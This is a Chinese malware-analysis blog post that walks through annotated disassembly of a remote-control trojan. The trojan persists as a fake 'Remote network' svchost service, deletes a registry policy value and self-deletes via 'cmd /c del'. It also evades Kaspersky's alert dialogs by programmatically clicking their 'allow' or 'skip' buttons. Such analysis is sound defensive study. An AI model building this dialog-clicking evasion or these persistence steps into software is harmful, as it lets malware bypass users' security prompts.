yxyhack
yxyhack

一个过主动防御的方法

 今天拿到一个过kaspersky主动防御而不改系统时间的远控马,于是分析下吧:

首先当然是创建线程:
push    esp             ; lpThreadId
push    0               ; dwCreationFlags
push    0               ; lpParameter
push    offset sub_409178 ; lpStartAddress
push    0               ; dwStackSize
push    0               ; lpThreadAttributes
call    CreateThread
pop     edx
retn
获得句柄:
push    105h            ; nSize
lea     eax, [esp+10Ch+Filename]
push    eax             ; lpFilename
push    0               ; hModule
call    GetModuleFileNameA
mov     ecx, eax
mov     edx, esp
mov     eax, ebx
call    sub_403DD4
jmp     short loc_402808


然后正式开始做坏事咯:

push    ebp
mov     ebp, esp
add     esp, 0FFFFFFF8h
push    ebx
xor     eax, eax
mov     [ebp+var_8], eax
xor     eax, eax
push    ebp
push    offset sub_408E55
push    dword ptr fs:[eax]
mov     fs:[eax], esp
xor     ebx, ebx
lea     eax, [ebp+var_8]
mov     edx, offset s_SoftwareMicro ; 'Software/Microsoft/Windows/CurrentVersion/Policies/system'
call    sub_403D7C
lea     eax, [ebp+hKey]
push    eax             ; phkResult
push    0F003Fh         ; samDesired
push    0               ; ulOptions
mov     eax, [ebp+var_8]
call    sub_404158
push    eax             ; lpSubKey
push    80000001h       ; hKey
call    RegOpenKeyExA_0
test    eax, eax
jnz     short loc_408E3F


哦?RegOpenKeyExA这是要干什么呢?
push    offset s_Disableregist ; "DisableRegistryTools"
mov     eax, [ebp+hKey]
push    eax             ; hKey
call    RegDeleteValueA
test    eax, eax
jnz     short loc_408E3D
哦 原来是禁用了注册表咯
接着:
loc_4091FF:             ; uSize
push    100h
lea     eax, [ebp+Buffer]
push    eax             ; lpBuffer
call    GetWindowsDirectoryA
jmp     short loc_409236

得到系统目录后:
loc_40A451:
lea     edx, [ebp+var_1C]
mov     eax, 1
call    sub_4091CC
mov     edx, [ebp+var_1C]
mov     eax, offset dword_40CCD0
mov     ecx, offset s_Svchost_exe-k ; "svchost.exe -k remoteservice"
call    sub_403FA4
lea     edx, [ebp+var_20]
mov     eax, 1
call    sub_4091CC
mov     edx, [ebp+var_20]
mov     eax, offset dword_40CCCC
mov     ecx, offset s_Sys_dll_0 ; "sys.dll"
call    sub_403FA4
call    sub_40A030
test    al, al
jz      short loc_40A4FC


释放个sys.dll,然后:  


push    ebp
mov     ebp, esp
push    0
push    ebx
xor     eax, eax
push    ebp
push    offset s_SCILYRemotese ; "閈b朶xFF/xFF腽嬅[Y]胷emoteservice"
push    dword ptr fs:[eax]
mov     fs:[eax], esp
xor     ebx, ebx
push    offset dword_40C8CC ; phkResult
push    20019h          ; samDesired
push    0               ; ulOptions
mov     eax, ds:off_40B2C4
call    sub_404158
push    eax             ; lpSubKey
push    80000002h       ; hKey
call    RegOpenKeyExA_0
test    eax, eax
jnz     short loc_40A0D3

mov     ds:dword_40CCC8, 3E9h
mov     eax, ds:dword_40CCC8
mov     ds:cbData, eax
mov     ds:Type, 7
push    offset cbData   ; lpcbData
push    offset Data     ; lpData
push    offset Type     ; lpType
push    0               ; lpReserved
push    (offset s_SCILYRemotese+0Dh) ; lpValueName
mov     eax, ds:dword_40C8CC
push    eax             ; hKey
call    RegQueryValueExA_0
test    eax, eax
jnz     short loc_40A0C8
又是注册表,看看写了虾米东西:
push    ebp
push    offset loc_40A572
push    dword ptr fs:[eax]
mov     fs:[eax], esp
lea     eax, [ebp+var_24]
mov     edx, offset s_RemoteNetwork ; "Remote network Help  Control Service"
call    sub_403EC0
mov     eax, [ebp+var_24]
push    eax
mov     eax, ds:dword_40CCD0
call    sub_404158
mov     edx, eax
lea     eax, [ebp+var_28]
call    sub_403EC0
mov     ecx, [ebp+var_28]
mov     edx, offset s_RemoteNetwo_0 ; "Remote network Help  Control Service"
mov     eax, ds:off_40B2C8
call    sub_409D6C
xor     eax, eax
pop     edx
pop     ecx
pop     ecx
mov     fs:[eax], edx
jmp     short loc_40A57C

其实服务名很烂,一看就是马
具体的服务信息:
push    ebp
mov     ebp, esp
add     esp, 0FFFFFFE0h
push    ebx
xor     ebx, ebx
mov     [ebp+var_20], ebx
mov     [ebp+var_C], ecx
mov     [ebp+var_8], edx
mov     [ebp+var_4], eax
mov     eax, [ebp+var_4]
call    sub_404148
mov     eax, [ebp+var_8]
call    sub_404148
mov     eax, [ebp+var_C]
call    sub_404148
mov     eax, [ebp+arg_0]
call    sub_404148
xor     eax, eax
push    ebp
push    offset sub_409EDD
push    dword ptr fs:[eax]
mov     fs:[eax], esp
mov     [ebp+var_D], 0
push    0F003Fh         ; dwDesiredAccess
push    0               ; lpDatabaseName
push    0               ; lpMachineName
call    OpenSCManagerA
mov     [ebp+hSCManager], eax
push    0               ; lpPassword
push    0               ; lpServiceStartName
push    0               ; lpDependencies
push    0               ; lpdwTagId
push    0               ; lpLoadOrderGroup
mov     eax, [ebp+var_C]
call    sub_404158
push    eax             ; lpBinaryPathName
push    0               ; dwErrorControl
push    2               ; dwStartType
push    110h            ; dwServiceType
push    0F01FFh         ; dwDesiredAccess
mov     eax, [ebp+var_8]
call    sub_404158
push    eax             ; lpDisplayName
mov     eax, [ebp+var_4]
call    sub_404158
push    eax             ; lpServiceName
mov     eax, [ebp+hSCManager]
push    eax             ; hSCManager  有兴趣的朋友可以算一下具体的配置信息咯;
call    CreateServiceA
mov     [ebp+hSCObject], eax
mov     eax, ds:off_40B420
cmp     dword ptr [eax], 0
jz      loc_409E9B



最后:
call    loc_409AD8
push    0               ; uCmdShow
call    GetCommandLineA_0
mov     edx, eax
lea     eax, [ebp+var_30]
call    sub_403EC0
mov     ecx, [ebp+var_30]
lea     eax, [ebp+var_2C]
mov     edx, offset s_CmdCDel ; "cmd /c del "   
call    sub_403FA4
mov     eax, [ebp+var_2C]
call    sub_404158
push    eax             ; lpCmdLine
call    WinExec         不得不说,这么删除。。。实在很懒...... 真是奇怪?很普通的服务启动,跟鸽子一样,怎么能过卡巴呢?
原来如此:
00408F19  |.  68 FF000000   push    0FF                              ; /Count = FF (255.)
00408F1E  |.  8D85 00FFFFFF lea     eax, dword ptr [ebp-100]         ; |
00408F24  |.  50            push    eax                              ; |Buffer
00408F25  |.  53            push    ebx                              ; |hWnd
00408F26  |.  E8 19C0FFFF   call    <jmp.&user32.GetClassNameA>      ; /GetClassNameA  得到类名
00408F2B  |.  68 FF000000   push    0FF                              ; /Count = FF (255.)
00408F30  |.  8D85 00FEFFFF lea     eax, dword ptr [ebp-200]         ; |
00408F36  |.  50            push    eax                              ; |Buffer
00408F37  |.  53            push    ebx                              ; |hWnd
00408F38  |.  E8 1FC0FFFF   call    <jmp.&user32.GetWindowTextA>     ; /GetWindowTextA  得到窗体标题

开始寻找avp窗体,也就是kaspersky主程序
如果有kaspersky子窗体的button

00408F54  |.  BA 98904000   mov     edx, 00409098                    ;  avp.button
00408F59  |.  E8 46B1FFFF   call    004040A4
00408F5E  |.  0F85 F8000000 jnz     0040905C
00408F64  |.  8D95 F8FDFFFF lea     edx, dword ptr [ebp-208]
00408F6A  |.  8D85 00FEFFFF lea     eax, dword ptr [ebp-200]
00408F70  |.  E8 C3D0FFFF   call    00406038
00408F75  |.  8B85 F8FDFFFF mov     eax, dword ptr [ebp-208]
00408F7B  |.  BA AC904000   mov     edx, 004090AC                    ;  允许
00408F80  |.  E8 1FB1FFFF   call    004040A4
00408F85  |.  0F84 B3000000 je      0040903E
00408F8B  |.  8D95 F4FDFFFF lea     edx, dword ptr [ebp-20C]
00408F91  |.  8D85 00FEFFFF lea     eax, dword ptr [ebp-200]
00408F97  |.  E8 9CD0FFFF   call    00406038
00408F9C  |.  8B85 F4FDFFFF mov     eax, dword ptr [ebp-20C]
00408FA2  |.  BA BC904000   mov     edx, 004090BC                    ;  跳过
00408FA7  |.  E8 F8B0FFFF   call    004040A4
00408FAC  |.  0F84 8C000000 je      0040903E
00408FB2  |.  8D95 F0FDFFFF lea     edx, dword ptr [ebp-210]
00408FB8  |.  8D85 00FEFFFF lea     eax, dword ptr [ebp-200]
00408FBE  |.  E8 75D0FFFF   call    00406038
00408FC3  |.  8B85 F0FDFFFF mov     eax, dword ptr [ebp-210]
00408FC9  |.  BA CC904000   mov     edx, 004090CC                    ; "允许" 繁体都照顾到了,真强,希望下次英文的pass也有.
00408FCE  |.  E8 D1B0FFFF   call    004040A4
00408FD3  |.  74 69         je      short 0040903E
00408FD5  |.  8D95 ECFDFFFF lea     edx, dword ptr [ebp-214]
00408FDB  |.  8D85 00FEFFFF lea     eax, dword ptr [ebp-200]
00408FE1  |.  E8 52D0FFFF   call    00406038
00408FE6  |.  8B85 ECFDFFFF mov     eax, dword ptr [ebp-214]
00408FEC  |.  BA DC904000   mov     edx, 004090DC
00408FF1  |.  E8 AEB0FFFF   call    004040A4
00408FF6  |.  74 46         je      short 0040903E
00408FF8  |.  8D95 E8FDFFFF lea     edx, dword ptr [ebp-218]
00408FFE  |.  8D85 00FEFFFF lea     eax, dword ptr [ebp-200]
00409004  |.  E8 2FD0FFFF   call    00406038
00409009  |.  8B85 E8FDFFFF mov     eax, dword ptr [ebp-218]
0040900F  |.  BA EC904000   mov     edx, 004090EC
00409014  |.  E8 8BB0FFFF   call    004040A4
00409019  |.  74 23         je      short 0040903E
0040901B  |.  8D95 E4FDFFFF lea     edx, dword ptr [ebp-21C][table=72%,#ffffff][tr][td=1,1,97%][/td][/tr][tr][td]00409021  |.  8D85 00FEFFFF lea     eax, dword ptr [ebp-200]
00409027  |.  E8 0CD0FFFF   call    00406038
0040902C  |.  8B85 E4FDFFFF mov     eax, dword ptr [ebp-21C]
00409032  |.  BA FC904000   mov     edx, 004090FC
00409037  |.  E8 68B0FFFF   call    004040A4
0040903C  |.  75 1E         jnz     short 0040905C
0040903E  |>  6A 00         push    0                                ; /lParam = 0
00409040  |.  6A 00         push    0                                ; |wParam = 0
00409042  |.  68 F5000000   push    0F5                              ; |Message = BM_CLICK
00409047  |.  53            push    ebx                              ; |hWnd
00409048  |.  E8 27BFFFFF   call    <jmp.&user32.SendMessageA>       ; /SendMessageA
0040904D  |.  6A 00         push    0                                ; /lParam = 0
0040904F  |.  6A 00         push    0                                ; |wParam = 0
00409051  |.  68 F5000000   push    0F5                              ; |Message = BM_CLICK
00409056  |.  53            push    ebx                              ; |hWnd
00409057  |.  E8 18BFFFFF   call    <jmp.&user32.SendMessageA>       ; /SendMessageA

BM_CLICK原形,MSDN:
Simulates the user clicking a button. This message causes the button to receive the WM_LBUTTONDOWN and WM_LBUTTONUP messages, and the button's parent window to receive a BN_CLICKED notification message


通过SendMessageA来点击允许,失败则点击跳过


00409104  /.  55            push    ebp
00409105  |.  8BEC          mov     ebp, esp
00409107  |.  6A 00         push    0                                ; /Title = NULL
00409109  |.  68 4C914000   push    0040914C                         ; |avp.product_notification
0040910E  |.  E8 29BEFFFF   call    <jmp.&user32.FindWindowA>        ; /FindWindowA
00409113  |.  85C0          test    eax, eax
00409115  |.  74 12         je      short 00409129
00409117  |.  6A 00         push    0                                ; /lParam = 0
00409119  |.  68 60F00000   push    0F060                            ; |wParam = F060
0040911E  |.  68 12010000   push    112                              ; |Message = WM_SYSCOMMAND
00409123  |.  50            push    eax                              ; |hWnd
00409124  |.  E8 4BBEFFFF   call    <jmp.&user32.SendMessageA>       ; /SendMessageA
00409129  |>  6A 00         push    0                                ; /Title = NULL
0040912B  |.  68 68914000   push    00409168                         ; |avp.alertdialog
00409130  |.  E8 07BEFFFF   call    <jmp.&user32.FindWindowA>        ; /FindWindowA
00409135  |.  85C0          test    eax, eax
00409137  |.  74 0D         je      short 00409146
00409139  |.  6A 00         push    0                                ; /lParam = 0
0040913B  |.  68 C08E4000   push    00408EC0                         ; |Callback = server.00408EC0
00409140  |.  50            push    eax                              ; |hParent
00409141  |.  E8 EEBDFFFF   call    <jmp.&user32.EnumChildWindows>   ; /EnumChildWindows
00409146  |>  5D            pop     ebp
00409147  /.  C2 1400       retn    14
0040914A      00            db      00
0040914B      00            db      00
0040914C   .  41 56 50 2E 5>ascii   "AVP.Product_Noti"
0040915C   .  66 69 63 61 7>ascii   "fication",0
00409165      00            db      00
00409166      00            db      00
00409167      00            db      00
00409168   .  41 56 50 2E 4>ascii   "AVP.AlertDialog",0
00409178   .  6A 01         push    1
0040917A   .  6A 00         push    0
0040917C   .  68 04914000   push    00409104
00409181   .  6A 00         push    0
00409183   .  6A 01         push    1
00409185   .  E8 5EF8FFFF   call    <jmp.&winmm.timeSetEvent>
0040918A   .  A3 64C84000   mov     dword ptr [40C864], eax
0040918F   >  6A 00         push    0                                ; /MsgFilterMax = 0
00409191   .  6A 00         push    0                                ; |MsgFilterMin = 0
00409193   .  6A 00         push    0                                ; |hWnd = NULL
00409195   .  68 68C84000   push    0040C868                         ; |pMsg = server.0040C868
0040919A   .  E8 ADBDFFFF   call    <jmp.&user32.GetMessageA>        ; /GetMessageA
枚举一个父窗口的所有子窗口,也就是EnumChildWindows,获取提示框信息,


这里看的出,如果kaspersky出现子窗口,而且含有跳过,允许,那么就会被程序控制......
00409185   .  E8 5EF8FFFF   call    <jmp.&winmm.timeSetEvent>
0040918A   .  A3 64C84000   mov     dword ptr [40C864], eax
0040918F   >  6A 00         push    0                                ; /MsgFilterMax = 0
00409191   .  6A 00         push    0                                ; |MsgFilterMin = 0
00409193   .  6A 00         push    0                                ; |hWnd = NULL
00409195   .  68 68C84000   push    0040C868                         ; |pMsg = server.0040C868
0040919A   .  E8 ADBDFFFF   call    <jmp.&user32.GetMessageA>        ; /GetMessageA
0040919F   .  85C0          test    eax, eax
004091A1   .^ 75 EC         jnz     short 0040918F
004091A3   .  C3            retn
004091A4  /$  51            push    ecx
004091A5  |.  84C0          test    al, al
004091A7  |.  74 15         je      short 004091BE
004091A9  |.  54            push    esp                              ; /pThreadId
004091AA  |.  6A 00         push    0                                ; |CreationFlags = 0
004091AC  |.  6A 00         push    0                                ; |pThreadParm = NULL
004091AE  |.  68 78914000   push    00409178                         ; |ThreadFunction = server.00409178
004091B3  |.  6A 00         push    0                                ; |StackSize = 0
004091B5  |.  6A 00         push    0                                ; |pSecurity = NULL
004091B7  |.  E8 58BCFFFF   call    <jmp.&kernel32.CreateThread>     ; /CreateThread

使用计时器反复获得信息,最后如果成功跳过kaspersky则createthread.


得到系统目录:
当然前面还有个getversion,用于判断是winnt还是windows目录。
004091FF  |> /68 00010000   push    100                              ; /BufSize = 100 (256.); Case 0 of switch 004091F3
00409204  |.  8D85 00FFFFFF lea     eax, dword ptr [ebp-100]         ; |
0040920A  |.  50            push    eax                              ; |Buffer
0040920B  |.  E8 CCBCFFFF   call    <jmp.&kernel32.GetWindowsDirecto>; /GetWindowsDirectoryA
00409210  |.  EB 24         jmp     short 00409236
00409212  |>  68 00010000   push    100                              ; /BufSize = 100 (256.); Case 1 of switch 004091F3
00409217  |.  8D85 00FFFFFF lea     eax, dword ptr [ebp-100]         ; |
0040921D  |.  50            push    eax                              ; |Buffer
0040921E  |.  E8 99BCFFFF   call    <jmp.&kernel32.GetSystemDirector>; /GetSystemDirectoryA
00409223  |.  EB 11         jmp     short 00409236
00409225  |>  8D85 00FFFFFF lea     eax, dword ptr [ebp-100]         ;  Case 2 of switch 004091F3
0040922B  |.  50            push    eax                              ; /Buffer
0040922C  |.  68 00010000   push    100                              ; |BufSize = 100 (256.)
00409231  |.  E8 8EBCFFFF   call    <jmp.&kernel32.GetTempPathA>     ; /GetTempPathA
00409236  |>  83FB 02       cmp     ebx, 2                           ;  Default case of switch 004091F3


最后:
004092FC  |.  50            push    eax                              ; |ResourceName
004092FD  |.  A1 60C64000   mov     eax, dword ptr [40C660]          ; |
00409302  |.  50            push    eax                              ; |hModule => NULL
00409303  |.  E8 4CBBFFFF   call    <jmp.&kernel32.FindResourceA>    ; /FindResourceA
00409308  |.  8BD8          mov     ebx, eax
0040930A  |.  85DB          test    ebx, ebx
0040930C  |.  74 67         je      short 00409375
0040930E  |.  53            push    ebx                              ; /hResource
0040930F  |.  A1 60C64000   mov     eax, dword ptr [40C660]          ; |
00409314  |.  50            push    eax                              ; |hModule => NULL
00409315  |.  E8 D2BBFFFF   call    <jmp.&kernel32.LoadResource>     ; /LoadResource
0040931A  |.  85C0          test    eax, eax
0040931C  |.  74 57         je      short 00409375
0040931E  |.  50            push    eax                              ; /hResource
0040931F  |.  E8 D0BBFFFF   call    <jmp.&kernel32.LockResource>     ; /LockResource
00409324  |.  8BF8          mov     edi, eax
00409326  |.  53            push    ebx                              ; /hResource
00409327  |.  A1 60C64000   mov     eax, dword ptr [40C660]          ; |
0040932C  |.  50            push    eax                              ; |hModule => NULL
0040932D  |.  E8 D2BBFFFF   call    <jmp.&kernel32.SizeofResource>   ; /SizeofResource
00409332  |.  8BD8          mov     ebx, eax
00409334  |.  85FF          test    edi, edi
00409336  |.  74 3D         je      short 00409375
00409338  |.  6A 00         push    0
0040933A  |.  68 80000000   push    80
0040933F  |.  6A 02         push    2
00409341  |.  6A 00         push    0
00409343  |.  6A 00         push    0
00409345  |.  68 000000C0   push    C0000000
0040934A  |.  8B45 F4       mov     eax, dword ptr [ebp-C]
0040934D  |.  E8 06AEFFFF   call    00404158
00409352  |.  50            push    eax                              ; |FileName
00409353  |.  E8 B4BAFFFF   call    <jmp.&kernel32.CreateFileA>      ; /CreateFileA
00409358  |.  8BF0          mov     esi, eax
0040935A  |.  83FE FF       cmp     esi, -1
0040935D  |.  74 16         je      short 00409375
0040935F  |.  6A 00         push    0                                ; /pOverlapped = NULL
00409361  |.  8D45 EC       lea     eax, dword ptr [ebp-14]          ; |
00409364  |.  50            push    eax                              ; |pBytesWritten
00409365  |.  53            push    ebx                              ; |nBytesToWrite
00409366  |.  57            push    edi                              ; |Buffer
00409367  |.  56            push    esi                              ; |hFile
00409368  |.  E8 AFBBFFFF   call    <jmp.&kernel32.WriteFile>        ; /WriteFile
0040936D  |.  85C0          test    eax, eax
0040936F  |.  74 04         je      short 00409375
00409371  |.  C645 F3 01    mov     byte ptr [ebp-D], 1
00409375  |>  83FE FF       cmp     esi, -1
00409378  |.  74 06         je      short 00409380
0040937A  |.  56            push    esi                              ; /hObject
0040937B  |.  E8 7CBAFFFF   call    <jmp.&kernel32.CloseHandle>      ; /CloseHandle

创建文件,关闭句柄。

你可能感兴趣的:(c,service,null,buffer,NetWork,button)

  • 机器学习与深度学习间关系与区别 ℒℴѵℯ心·动ꦿ໊ོ꫞ 人工智能学习深度学习python
    一、机器学习概述定义机器学习(MachineLearning,ML)是一种通过数据驱动的方法,利用统计学和计算算法来训练模型,使计算机能够从数据中学习并自动进行预测或决策。机器学习通过分析大量数据样本,识别其中的模式和规律,从而对新的数据进行判断。其核心在于通过训练过程,让模型不断优化和提升其预测准确性。主要类型1.监督学习(SupervisedLearning)监督学习是指在训练数据集中包含输入
  • android系统selinux中添加新属性property 辉色投像
    1.定位/android/system/sepolicy/private/property_contexts声明属性开头:persist.charge声明属性类型:u:object_r:system_prop:s0图12.定位到android/system/sepolicy/public/domain.te删除neverallow{domain-init}default_prop:property
  • 【iOS】MVC设计模式 Magnetic_h iosmvc设计模式objective-c学习ui
    MVC前言如何设计一个程序的结构,这是一门专门的学问,叫做"架构模式"(architecturalpattern),属于编程的方法论。MVC模式就是架构模式的一种。它是Apple官方推荐的App开发架构,也是一般开发者最先遇到、最经典的架构。MVC各层controller层Controller/ViewController/VC(控制器)负责协调Model和View,处理大部分逻辑它将数据从Mod
  • OC语言多界面传值五大方式 Magnetic_h iosui学习objective-c开发语言
    前言在完成暑假仿写项目时,遇到了许多需要用到多界面传值的地方,这篇博客来总结一下比较常用的五种多界面传值的方式。属性传值属性传值一般用前一个界面向后一个界面传值,简单地说就是通过访问后一个视图控制器的属性来为它赋值,通过这个属性来做到从前一个界面向后一个界面传值。首先在后一个界面中定义属性@interfaceBViewController:UIViewController@propertyNSSt
  • UI学习——cell的复用和自定义cell Magnetic_h ui学习
    目录cell的复用手动(非注册)自动(注册)自定义cellcell的复用在iOS开发中,单元格复用是一种提高表格(UITableView)和集合视图(UICollectionView)滚动性能的技术。当一个UITableViewCell或UICollectionViewCell首次需要显示时,如果没有可复用的单元格,则视图会创建一个新的单元格。一旦这个单元格滚动出屏幕,它就不会被销毁。相反,它被添
  • element实现动态路由+面包屑 软件技术NINI vue案例vue.js前端
    el-breadcrumb是ElementUI组件库中的一个面包屑导航组件,它用于显示当前页面的路径,帮助用户快速理解和导航到应用的各个部分。在Vue.js项目中,如果你已经安装了ElementUI,就可以很方便地使用el-breadcrumb组件。以下是一个基本的使用示例:安装ElementUI(如果你还没有安装的话):你可以通过npm或yarn来安装ElementUI。bash复制代码npmi
  • C语言宏函数 南林yan C语言c语言
    一、什么是宏函数?通过宏定义的函数是宏函数。如下,编译器在预处理阶段会将Add(x,y)替换为((x)*(y))#defineAdd(x,y)((x)*(y))#defineAdd(x,y)((x)*(y))intmain(){inta=10;intb=20;intd=10;intc=Add(a+d,b)*2;cout<
  • C语言如何定义宏函数? 小九格物 c语言
    在C语言中,宏函数是通过预处理器定义的,它在编译之前替换代码中的宏调用。宏函数可以模拟函数的行为,但它们不是真正的函数,因为它们在编译时不会进行类型检查,也不会分配存储空间。宏函数的定义通常使用#define指令,后面跟着宏的名称和参数列表,以及宏展开后的代码。宏函数的定义方式:1.基本宏函数:这是最简单的宏函数形式,它直接定义一个表达式。#defineSQUARE(x)((x)*(x))2.带参
  • 理解Gunicorn:Python WSGI服务器的基石 范范0825 ipythonlinux运维
    理解Gunicorn:PythonWSGI服务器的基石介绍Gunicorn,全称GreenUnicorn,是一个为PythonWSGI(WebServerGatewayInterface)应用设计的高效、轻量级HTTP服务器。作为PythonWeb应用部署的常用工具,Gunicorn以其高性能和易用性著称。本文将介绍Gunicorn的基本概念、安装和配置,帮助初学者快速上手。1.什么是Gunico
  • Cell Insight | 单细胞测序技术又一新发现,可用于HIV-1和Mtb共感染个体诊断 尐尐呅
    结核病是艾滋病合并其他疾病中导致患者死亡的主要原因。其中结核病由结核分枝杆菌(Mycobacteriumtuberculosis,Mtb)感染引起,获得性免疫缺陷综合症(艾滋病)由人免疫缺陷病毒(Humanimmunodeficiencyvirustype1,HIV-1)感染引起。国家感染性疾病临床医学研究中心/深圳市第三人民医院张国良团队携手深圳华大生命科学研究院吴靓团队,共同研究得出单细胞测序
  • c++ 的iostream 和 c++的stdio的区别和联系 黄卷青灯77 c++算法开发语言iostreamstdio
    在C++中,iostream和C语言的stdio.h都是用于处理输入输出的库,但它们在设计、用法和功能上有许多不同。以下是两者的区别和联系:区别1.编程风格iostream(C++风格):C++标准库中的输入输出流类库,支持面向对象的输入输出操作。典型用法是cin(输入)和cout(输出),使用>操作符来处理数据。更加类型安全,支持用户自定义类型的输入输出。#includeintmain(){in
  • Long类型前后端数据不一致 igotyback 前端
    响应给前端的数据浏览器控制台中response中看到的Long类型的数据是正常的到前端数据不一致前后端数据类型不匹配是一个常见问题,尤其是当后端使用Java的Long类型(64位)与前端JavaScript的Number类型(最大安全整数为2^53-1,即16位)进行数据交互时,很容易出现精度丢失的问题。这是因为JavaScript中的Number类型无法安全地表示超过16位的整数。为了解决这个问
  • LocalDateTime 转 String igotyback java开发语言
    importjava.time.LocalDateTime;importjava.time.format.DateTimeFormatter;publicclassMain{publicstaticvoidmain(String[]args){//获取当前时间LocalDateTimenow=LocalDateTime.now();//定义日期格式化器DateTimeFormatterformat
  • swagger访问路径 igotyback swagger
    Swagger2.x版本访问地址:http://{ip}:{port}/{context-path}/swagger-ui.html{ip}是你的服务器IP地址。{port}是你的应用服务端口,通常为8080。{context-path}是你的应用上下文路径,如果应用部署在根路径下,则为空。Swagger3.x版本对于Swagger3.x版本(也称为OpenAPI3)访问地址:http://{ip
  • mysql禁用远程登录 igotyback mysql
    去mysql库中的user表里,将host都改成localhost之后刷新权限FLUSHPRIVILEGES;
  • Linux下QT开发的动态库界面弹出操作(SDL2) 13jjyao QT类qt开发语言sdl2linux
    需求:操作系统为linux,开发框架为qt,做成需带界面的qt动态库,调用方为java等非qt程序难点:调用方为java等非qt程序,也就是说调用方肯定不带QApplication::exec(),缺少了这个,QTimer等事件和QT创建的窗口将不能弹出(包括opencv也是不能弹出);这与qt调用本身qt库是有本质的区别的思路:1.调用方缺QApplication::exec(),那么我们在接口
  • 店群合一模式下的社区团购新发展——结合链动 2+1 模式、AI 智能名片与 S2B2C 商城小程序源码 说私域 人工智能小程序
    摘要:本文探讨了店群合一的社区团购平台在当今商业环境中的重要性和优势。通过分析店群合一模式如何将互联网社群与线下终端紧密结合,阐述了链动2+1模式、AI智能名片和S2B2C商城小程序源码在这一模式中的应用价值。这些创新元素的结合为社区团购带来了新的机遇,提升了用户信任感、拓展了营销渠道,并实现了线上线下的完美融合。一、引言随着互联网技术的不断发展,社区团购作为一种新兴的商业模式,在满足消费者日常需
  • html 中如何使用 uniapp 的部分方法 某公司摸鱼前端 htmluni-app前端
    示例代码:Documentconsole.log(window);效果展示:好了,现在就可以uni.使用相关的方法了
  • ArcGIS栅格计算器常见公式(赋值、0和空值的转换、补充栅格空值) 研学随笔 arcgis经验分享
    我们在使用ArcGIS时通常经常用到栅格计算器,今天主要给大家介绍我日常中经常用到的几个公式,供大家参考学习。将特定值(-9999)赋值为0,例如-9999.Con("raster"==-9999,0,"raster")2.给空值赋予特定的值(如0)Con(IsNull("raster"),0,"raster")3.将特定的栅格值(如1)赋值为空值,其他保留原值SetNull("raster"==
  • 高级编程--XML+socket练习题 masa010 java开发语言
    1.北京华北2114.8万人上海华东2,500万人广州华南1292.68万人成都华西1417万人(1)使用dom4j将信息存入xml中(2)读取信息,并打印控制台(3)添加一个city节点与子节点(4)使用socketTCP协议编写服务端与客户端,客户端输入城市ID,服务器响应相应城市信息(5)使用socketTCP协议编写服务端与客户端,客户端要求用户输入city对象,服务端接收并使用dom4j
  • 水平垂直居中的几种方法(总结) LJ小番茄 CSS_玄学语言htmljavascript前端csscss3
    1.使用flexbox的justify-content和align-items.parent{display:flex;justify-content:center;/*水平居中*/align-items:center;/*垂直居中*/height:100vh;/*需要指定高度*/}2.使用grid的place-items:center.parent{display:grid;place-item
  • 回溯 Leetcode 332 重新安排行程 mmaerd Leetcode刷题学习记录leetcode算法职场和发展
    重新安排行程Leetcode332学习记录自代码随想录给你一份航线列表tickets,其中tickets[i]=[fromi,toi]表示飞机出发和降落的机场地点。请你对该行程进行重新规划排序。所有这些机票都属于一个从JFK(肯尼迪国际机场)出发的先生,所以该行程必须从JFK开始。如果存在多种有效的行程,请你按字典排序返回最小的行程组合。例如,行程[“JFK”,“LGA”]与[“JFK”,“LGB
  • 每日一题——第八十九题 互联网打工人no1 C语言程序设计每日一练c语言
    题目:在字符串中找到提取数字,并统计一共找到多少整数,a123xxyu23&8889,那么找到的整数为123,23,8889//思想:#include#include#includeintmain(){charstr[]="a123xxyu23&8889";intcount=0;intnum=0;//用于临时存放当前正在构建的整数。boolinNum=false;//用于标记当前是否正在读取一个整
  • 每日一题——第九十题 互联网打工人no1 C语言程序设计每日一练c语言
    题目:判断子串是否与主串匹配#include#include#include//////判断子串是否在主串中匹配//////主串///子串///boolisSubstring(constchar*str,constchar*substr){intlenstr=strlen(str);//计算主串的长度intlenSub=strlen(substr);//计算子串的长度//遍历主字符串,对每个可能得
  • 每日一题——第八十一题 互联网打工人no1 C语言程序设计每日一练c语言
    打印如下图案:#includeintmain(){inti,j;charch='A';for(i=1;i<5;i++,ch++){for(j=0;j<5-i;j++){printf("");//控制空格输出}for(j=1;j<2*i;j++)//条件j<2*i{printf("%c",ch);//控制字符输出}printf("\n");}return0;}
  • 每日一题——第八十四题 互联网打工人no1 C语言程序设计每日一练c语言
    题目:编写函数1、输入10个职工的姓名和职工号2、按照职工由大到小顺序排列,姓名顺序也随之调整3、要求输入一个职工号,用折半查找法找出该职工的姓名#define_CRT_SECURE_NO_WARNINGS#include#include#defineMAX_EMPLOYEES10typedefstruct{intid;charname[50];}Empolyee;voidinputEmploye
  • 每日一题——第八十二题 互联网打工人no1 C语言程序设计每日一练c语言
    题目:将一个控制台输入的字符串中的所有元音字母复制到另一字符串中#include#include#include#include#defineMAX_INPUT1024boolisVowel(charp);intmain(){charinput[MAX_INPUT];charoutput[MAX_INPUT];printf("请输入一串字符串:\n");fgets(input,sizeof(inp
  • 每日一题——第八十三题 互联网打工人no1 C语言程序设计每日一练c语言
    题目:将输入的整形数字输出,输出1990,输出"1990"#include#defineMAX_INPUT1024intmain(){intarrr_num[MAX_INPUT];intnum,i=0;printf("请输入一个数字:");scanf_s("%d",&num);while(num!=0){arrr_num[i++]=num%10;num/=10;}printf("\"");for(
  • C#中使用split分割字符串 互联网打工人no1 c#
    1、用字符串分隔:usingSystem.Text.RegularExpressions;stringstr="aaajsbbbjsccc";string[]sArray=Regex.Split(str,"js",RegexOptions.IgnoreCase);foreach(stringiinsArray)Response.Write(i.ToString()+"");输出结果:aaabbbc
  • WPF中的ComboBox控件几种数据绑定的方式 互联网打工人no1 wpfc#
    一、用字典给ItemsSource赋值(此绑定用的地方很多,建议熟练掌握)在XMAL中:在CS文件中privatevoidBindData(){DictionarydicItem=newDictionary();dicItem.add(1,"北京");dicItem.add(2,"上海");dicItem.add(3,"广州");cmb_list.ItemsSource=dicItem;cmb_l
  • Java实现的基于模板的网页结构化信息精准抽取组件:HtmlExtractor yangshangchuan 信息抽取HtmlExtractor精准抽取信息采集
    HtmlExtractor是一个Java实现的基于模板的网页结构化信息精准抽取组件,本身并不包含爬虫功能,但可被爬虫或其他程序调用以便更精准地对网页结构化信息进行抽取。   HtmlExtractor是为大规模分布式环境设计的,采用主从架构,主节点负责维护抽取规则,从节点向主节点请求抽取规则,当抽取规则发生变化,主节点主动通知从节点,从而能实现抽取规则变化之后的实时动态生效。 如
